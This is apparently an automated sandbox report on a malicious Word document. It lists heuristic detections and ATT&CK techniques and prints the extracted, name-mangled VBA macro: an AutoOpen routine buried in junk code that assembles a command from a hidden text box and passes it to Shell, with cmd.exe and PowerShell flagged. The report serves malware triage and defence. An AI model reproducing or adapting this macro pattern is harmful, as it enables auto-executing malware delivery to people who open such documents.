MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample contains a VBA macro with an autoopen subroutine that utilizes the Shell() function. This function is used to invoke external command-line utilities, specifically cmd.exe and powershell.exe, as indicated by the heuristics. This strongly suggests the macro's purpose is to download and execute a secondary payload, a common technique for malware delivery.
Heuristics 10
-
ClamAV: Doc.Trojan.Agent-6784393-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Agent-6784393-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(RifEW, PvJCIKR), ODKmGL) Set EEzwRXYYWmMJEWBYssiXq = qvQqmUzRkiwBrUaWVjZjQzv -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() iboRNoNsG -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11024 bytes |
SHA-256: 298b8ed499c854627de185665d97af143eb59ba7c24bd3bf1c28577f22c37809 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
305 of 345 identifiers look randomly generated (e.g. 'VHMwNAkREvGqrUhjTCbXtTTQ') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bAMYOAWAq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
iboRNoNsG
End Sub
Attribute VB_Name = "iLPVmbqDzOp"
Function iboRNoNsG()
On Error Resume Next
Set AFjiWZQIjriYNNikdqcDSC = qHuNmFttzWFqdloAsi
Select Case raBcPGFlRlpEWzl
Case 294919323
cMdCmzkCIWAwppjZNLt = fiGhUbIIRjtssNYjACFcQZ
kEmcvGfImrDvwFv = 220358850
pckYdIGbRCYLFQZF = WdizMBmbGApSZbFVun
Case 258373053
iGwjAdEGzjadpciSzLdbwz = CByte(HQJsaTpLdmQnQhBwiz)
dZZLcztnViJLqlkoPqld = ChrW(HVzrYoSkzMviSTwhEhuhfT)
UaaCfsmHwTrWEcUDJaCY = Log(OhXRnHKJrvHntdRwlm)
End Select
Set wsKhUqcZSBorbbjERJz = zzSofYEWQQaFPPrzIiHmWKU
Select Case zWAKkREMldaAZWCvlGJ
Case 17379138
jbLjlviCNXnduoIXulw = OUmprYljLAPBRwQu
bzVWJXGnXfitYrVKrLOpWs = 83319210
CrNHmLvXOiTldpEz = BTtDmnJuqamCESimLTSK
Case 332833921
MjKfpYjjCGRJVZ = CByte(GQEENvlIVJQkwSVmmh)
GJtHzkLKXjkvzJ = ChrW(EDNGlGbboVYnkOjTib)
SJNJGTCkNckNTafNSZ = Log(wtfiElZwavrMGTbrKruG)
End Select
Set fFoismXXvAtIjHsnqNh = hYNTThqpWGRwhBS
Select Case iFrYbfJXuBiJXiFGNzrHsVLK
Case 317819470
BojvahptElWIiCPpYSChR = AKkkKLGNtjcsiUowazTiiT
ESprDwsIPRNoYLqXimrrq = 209838471
YuAarFNnJhafRUTDQAYNb = jQnkaprnbtZhQzCWB
Case 20397087
dDGzfYCLiaqRSK = CByte(NknHiYvVFhGkEVB)
zVLwMZSHLYiJNkbGWIjRitY = ChrW(hiBQYozpjfrwGMuoRfwG)
mIUFANvmkMGwhQiXCiXaoch = Log(fzKNvzCzSjvZhKYaBDwTkzY)
End Select
Set bOsfIZbmvVhHJfor = FoAIYRNAlpkrAZYOvi
Select Case kwsaVSLkNdNCsWTbFmEDzifW
Case 233901892
vvwJtOwpHVNOfpMjAWYnsV = zSbqfBGTVqfXQnDkwGDO
NrGPrQdIwwzaOwrSYRnACrXA = 118676981
szmajpGijaUbnldKXuhwCpMS = pQOuWUGzvXjWXPIUfOR
Case 326234653
dBXsTdSVtDlTArZsnNFNdsOz = CByte(AiZcWauUcMOqCDrnbCTuDX)
jcsBLjTkmaETwtsXdqw = ChrW(fKBlKOaBqvCkcHqAiZ)
lJbbQzjstjiqEEzrYaGrz = Log(RurXUqrDstEHNOE)
End Select
Set LKaVabLaWnbGTdMR = ZokMzDlrTjFjHlaFZUEiJAn
Select Case ENSwjLHnpqziiALGpiHsGq
Case 103995649
BBuJIikYBwHllo = HbStQlrWZIwsfsvf
wQvfQwfGFajjsZUBU = 339968824
nwwQJiVAKqFfGStnV = frcnmLKLnjidqLtisRzzmBv
Case 331568220
QzuaQwlzIoIoAJnFwr = CByte(RjzumcaboWGdwiSWMPlWhw)
hWkqrIMtoKGjoREHzqXz = ChrW(CLMKinapMVGVCRYCmjTc)
STpzdEHHnjKzBfKYfJUl = Log(bpzLmAjFLGDUAk)
End Select
Set hEdatNjaNisfwPo = wqucnUMaDpimwFpIZVrCBaB
Select Case UsrHYpDkPwmXYAR
Case 80264104
DXEjuiHokGcXlpYooHvdFBN = uXzSRjZEfKwDzWaNkSojb
dIOjjsWimBJSoXjo = 151314819
jYsarVqSjhtmNd = htoEiAjhwYwtfhDh
Case 313382963
nDDUCRtsRMopAofIHdrkoAzq = CByte(CvbLkdAzqZaGNqXLpjUtHYH)
WaZpLHnENYAWRhhj = ChrW(rJPFBtnUYwQiwninOoJDLm)
mVtoqBtIClFPOsHUjmVmI = Log(ZQkWiDsXfcFZdjIFwS)
End Select
Set fMsSHkCsdTUSjKwn = djpoPjqtRwuwTPbruIBHzz
Select Case rjiVJirjJcuJQIYPjB
Case 164713159
lHtKEsaoBzjniOwFkKhOZO = WYGLiWsVFaIjjpURQDChM
HiBKTiVUKQWWXlzjsSJbaMVf = 94173982
QtQLXhYaQbKYDNzkP = MNSjTjLjYkVuJWwDOcEzspz
Case 318181226
WWUPvbpwcTBwhZjznI = CByte(FWRocAzXjQzWPVOzNrUdIj)
hCuEhCYzFhJrwEisPvDJjczm = ChrW(SbTISifZYklhvRVHRuoF)
QtizFhEWREFIcObFrmCd = Log(ZUwKUdiBOiIjzCioI)
End Select
Set BamsJHPErMjsqkq = DqBkhaMDRrXuLzhFPRsoAO
Select Case GYaKQSzjzwXLifwZbNiaSj
Case 136166071
tfbcZrCppBvMHQvlUHYwnmw = SrRaRnXWDhQlrUKHthW
kkSKRzFKLWFGjAJiabYBi = 164536398
azKtAzQEFQRqiZG = ThMKhbJFqKchSJU
Case 17047720
bsLHEFNuSzqPKbIT = CByte(EUSObwpFCpUjlwvOf)
jvAPcwPPbSpjjTN = ChrW(FAkwAtVCBPtKjDvAfTcXRosT)
MXWPWGBVlquiiHnawOMFEiXX = Log(BPrqiRIQwnVwnfJrouNAWz)
End Select
Set IqczdppcGRoHnoiJKf = vbwZljGzXIKqIjW
Select Case AADaVhXHsdaVCEF
Case 329479965
kauLRqTWrRTwafaQihIHE = OEpjIGkvSDMJYFbujJjDdP
KSzzETWwqczLqW = 239401911
NmwzQjRHVpowwXAJzAiOL = fbvHVjatkXzbWRh
Case 107757129
bBpiPiYzScoMqrWWGGUDJN = CByte(hbFQwXBjcjNDMVcQwXJDD)
hujdEPLMNdNQICKOZaQtLd = ChrW(oJBipXjzKhvuKkVSmXP)
kqwNaGizjmKaESrTDl = Log(ojdCiNIzdDHiVwHrzM)
End Select
Const PvJCIKR = 0
Set UcsFhEIiwoqAlri = ZzXkRBjdjWNwaXtAkLOw
Select Case wiOfiqNkoNzrrioo
Case 160369203
SsPZLqMIYuqQadmRdPIFjL = trIQEitFMLWwDwXWYS
SStYnUFaBYfTFGWVhCa = 52437728
fpiEEjiSFskmJtDzTVv = IrjjsQphcpUzKzndPTinWHvj
Case 308759328
vNSWOjiIRnIzLnrAqQXmb = CByte(FZjzmIcBvzlLUbOG)
nTChzVRHvvVQfJIGlHt = ChrW(PuWjQrJMATQmkojTYdGESr)
MGkQqdFjTVTMtwWQHMFHcfj = Log(qZohHBoUXCKZjbSivjwQ)
End Select
Set CuXIijSnAkFbRw = XXwDoKiWtjOkqACJuIirco
Select Case DkzaihZTlzSQQiznrUXdb
Case 104594698
bnzaLTnHNimuSqkzoTMdnYkm = uUnXFLInlVnkHOAwpFhd
jzHUiKOmLDDLvRwAkIXiH = 218798861
zPhFMfzSCIvNXfDWAt = aSjYLzCwFzJzcz
Case 184904213
EBECHOkADADaUhlW = CByte(FHCNqVIJhsVtISNvVwUwr)
MhjVKtbdXLmOWsZwNfvsZVP = ChrW(uhpfwjRatLuUdVK)
iDUKGtwVVYkoBwUqS = Log(adDwfouMVKzETsUjKWB)
End Select
Set kNBuZvDKXuCFVSkMliiNKMp = zKdDAiEoFGUWTEvjws
Select Case qNHAKWlmOtYhXYfwORAKs
Case 278185363
APwOshmCPSczIqKTj = rpujZwzoHhPwirzzG
MItFcrJOvZXFEwUvBBUTp = 8935426
DZEnQklzIjYHXUmMC = KBYRCdQdmpwfmvKspf
Case 159645041
siKaOVfrwbPoRw = CByte(zrmXbWmzvAdzdwfiGozf)
rwCjwZhLaKNqQLADIziF = ChrW(OZkYBuRwIATRwItjrcwFl)
qQGNlibwqPZzcYSHwf = Log(PRJuZRDHTQUmAvtjU)
End Select
Set zRiOoujAQwRYUzs = uljIjTZcOqbwrYhhqAiiSi
Select Case McDqvwPFYzqEjGqWirBz
Case 327185486
iIrRkiTSKTQGWjjdii = kDABUAaAiAqRihtuuwiNjmFn
najKpANXzMPhHXQJip = 120702312
BlYdlmiAQSwzNijarq = zcufUdMnbNDwznTVBBFYDV
Case 87360150
jORTdqpSsASrHGD = CByte(ZwDmMTBKuIfZlR)
dPnwGLsKkXlGwUbNvzFwE = ChrW(atMNHZULQjaPpcTIz)
joTPbNEpSujbjSjLotltET = Log(YHEjhfztmAQSPzLSzIRGZb)
End Select
Set QECwSlHoYiOkGRR = zkTwAjzqSHYIFhj
Select Case kuAHbfTwiYrSCUShkDUf
Case 197323942
FhHMdLNwirzlzMRJiTRUT = rfnzprYBMBzDoTAPBHl
pAURUGPaVANJNdpcYjWW = 175505117
fwmwXzJSSJjnnrKWcibz = LnppLdXqUlOFIUXfYiRR
Case 17551046
DaaqwRCDnvdATIwGMUlcw = CByte(UhiWmrDAJjddkPPVfGo)
wTcHAPiSWzfajfFsL = ChrW(iKzmlwXqYhrqofnhZBF)
VXIldLBDtEJWJEbdQL = Log(fkKqBbfJAmCFEnoFGCOIZ)
End Select
RifEW = bAMYOAWAq.TextBox1 + mUJJE + fURjfQoW + VhviXIh + ZDipzpI + vIApiRX + wksbP + hoVLZ + nbRwwfT + vKbufj + KkGAhHO + mwEQtOjf + QUbHhm
Set kBvXcQstiHEjSBCVWGS = zioloJHvFjKNfHpDtKKW
Select Case dJZsCSMJXnHSCaGM
Case 66658954
TIwouwqELLwbMvwRTUOsm = vmiwDudjjrjbrOOpOcCwHAK
bLWlHlzRzcMKGztvaicHskEi = 15662787
FmqnjucmUrYsZwtSiOBE = RjGXcYDDqGoidfLaJtSiT
Case 190112752
XiFdOZFpjzuoCk = CByte(GWZjikjJwThsVVjWP)
hjoXvodkRIliqJqtmvJkwQ = ChrW(ZIJhhkUzbfAVAajbkFtTbY)
dYCbjnNipQwPOlHw = Log(zKJDpnpTDUYfFz)
End Select
Set pnjNOccOkfdJiXJ = SwAJsJLOGtdAsUXpiqDOj
Select Case KInwGzJjbwzqznQ
Case 116619280
jbVHUwcVQHnaoTvEM = sWuCOEWRfACUkYRcXmLwpK
cqpVIniElnBYvUdN = 107148749
DTbTvXPJLwItNwhLRLYjN = AwQhizVHtZvNmqjIvSFz
Case 182244222
wsZFrjCRohXYSfCNoQnEC = CByte(zAJrbJQGdOCSzYIdImFbl)
pNYEGhdpLXfNvYvzH = ChrW(BhDJWAfiFLHBwawjLvSXDid)
CimmdjhIiMaDKfrYYbbShJ = Log(FQLNAhkqSEQGrNtBWdz)
End Select
Set CWPMwKYFGhEBDDiC = NpmpmJdoXEZLNKKXTHMN
Select Case RFIIZNKfOwthwrRH
Case 165561409
NlXZFztsXtdjwWpTv = djMvSJIGfiPTtPurwbosA
PhqQBfCXsfvhdsDS = 124371280
QwTOcEANoFXNiDkTQ = ECIdEImkXLlBnjIabBqB
Case 33405359
PnqwziAswJcYNQGnuLcrjo = CByte(mRrEDbjdPZRmUmHIHjf)
bZOSrUoGfYNGaLDiI = ChrW(zQNjMzvilAnCUIBaAND)
MjnczqMLLJjcAhmOAvM = Log(XNjnTdEFEALqbkNOc)
End Select
Set UsFcWKYEQjbjHYN = AaFmwktEsDsPUsZuR
Select Case YAwQoZYwQanuWp
Case 107936686
quMXJjwAjSSIjXGjRFzNSj = fNzUSRzjCzfBihtspBvhVH
OsTGcRqDWHIhJMOfj = 250089700
PJEVcwXNKLWCQXzicwKVPM = JuWAjfaWMvjsGKWrHEDjrzFs
Case 60291275
dmjYQWCMubFwohjp = CByte(HjfqYFGDQLjEKpir)
BnpniNptPumJQWwCozL = ChrW(VFjaVzKWIkmbGQfwzXcT)
zILUtApjCVrSOCwHPRiDTl = Log(ILCAqACRUsnYzVFbzUmF)
End Select
Set vWMavmlsYSBEqYAblUwB = irCKPSGICczznsdXsobiM
Select Case woHKXCDwQLhvRiKQfUi
Case 237918457
pBGDfXEtfVTXEsOCFu = EGLoQsbwNcJHDc
ImBGrfzDkpOXNl = 316056137
aaafPiNqLEYqQWNP = AkbBwCYFCawBUONROihczoi
Case 167424946
vmGImOcwcMBUMcXC = CByte(MDOoqqLZBnjnwMFCqDP)
wQMWDsBLwCGKaXbbL = ChrW(EwuikavLiAwSVZHjdw)
rlwpzdwhWMakdqUzTXNflbr = Log(APihhCqtikTkFHuF)
End Select
IsNjokFwP = Array(LdCJqzz, zEXaaiwl, piihf, Interaction _
_
_
_
_
_
_
_
.Shell(RifEW, PvJCIKR), ODKmGL)
Set EEzwRXYYWmMJEWBYssiXq = qvQqmUzRkiwBrUaWVjZjQzv
Select Case mwkucNrSrLNCfakD
Case 164427916
BiLCijwWXzzJbtz = DqjFoXnfKjHYqu
VHMwNAkREvGqrUhjTCbXtTTQ = 198884234
jswYafdzcCPzmDTYfJijvKcz = VPWFBowRRUrTfVaNrsfTVQ
Case 154585711
UoJhzAVPAkEQGu = CByte(NTfUjbFzoHTDSzdSFrT)
NiOURzcSvQKGzSRzqvobP = ChrW(UZizCSWRwYmKMiFLCjzmDY)
MFAfdcKDsUYKoqUwJvdRlUnF = Log(uisEbdlwcRrCntpoUupoY)
End Select
Set hIWSLXKDtTJPXj = LYwrvwzZZqtbAVOotG
Select Case jHouwEiWDXIazlk
Case 61543525
vhsDijzbSvJhffPIQCLXiC = QbvCQPvqQMYtMODwXrSdIU
YrtShiYmKsubcnhjMWFtVG = 253821352
tNEnfLYfwmWKXz = HraNASnaLqKGHCaTS
Case 33008738
YTilGzUOipQWJOHwCvsmkG = CByte(twVFRcVSDFhYudGTOjDIku)
ArzEYYaSFRhlokuDmI = ChrW(NRcpNVwbdGhzBzcUNR)
ztdmbGNrRjUcRzNjDYB = Log(jczwMYUflLPhlNLdkiAjzd)
End Select
Set VrDUHsvCvchHfqEmciZQWjJ = HlMLoTKFFwloJYQow
Select Case CfjWmXAslAzpUlhlNWfjObSb
Case 13529571
FPcDOkSYhihkwpLviJFPb = GXKtIOjaMIUDSkPhmOXwEDEd
qYStJVmHFIFtUcDoGSZ = 109279025
WajAXqsfvDThVSqRhDmivNb = nRmTHzliMdTzmsmi
Case 301877471
JFlMzJNXYOnizJzVNFEY = CByte(zSoUswsfpRHoSDWYbSc)
jYWrddKwQfjaVFL = ChrW(wrHLVsjzfuhGdzlnbSnYvz)
OouPKkjSNribjLRkrpYLjvD = Log(SttzDRmrzBsXbdZNzb)
End Select
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.